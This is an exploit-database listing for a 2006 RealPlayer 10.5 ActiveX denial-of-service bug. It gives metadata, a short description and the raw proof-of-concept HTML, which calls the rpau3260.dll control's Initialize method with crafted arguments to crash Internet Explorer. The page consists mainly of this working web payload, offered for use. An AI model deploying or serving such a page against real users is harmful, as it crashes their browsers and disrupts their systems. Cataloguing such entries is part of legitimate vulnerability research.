header-logo
Suggest Exploit
vendor:
RealPlayer
by:
shinnai
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: RealPlayer
Affected Version From: RealPlayer 10.5
Affected Version To: RealPlayer 10.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2006

RealPlayer 10.5 rpau3260.dll Internet Explorer Denial of Service

This exploit causes a denial of service in Internet Explorer when a maliciously crafted web page is opened. The page contains an object tag with a classid of 'clsid:405DE7C0-E7DD-11D2-92C5-00C0F01F77C1' and an id of 'RealPlayer'. The page then calls the Initialize method of the RealPlayer object, causing Internet Explorer to crash.

Mitigation:

N/A
Source

Exploit-DB raw data:

<!--
---------------------------------------------------------------------------
RealPlayer 10.5 rpau3260.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<body>
<object classid="clsid:405DE7C0-E7DD-11D2-92C5-00C0F01F77C1" id="RealPlayer">
</object>
<script>
RealPlayer.Initialize("AA","defaultV")
</script>
</html>
</body>

<!--
Just initialize the control, the close IE :)
-->

# milw0rm.com [2006-12-20]

Navigation

Suggest Exploit

Services By CQR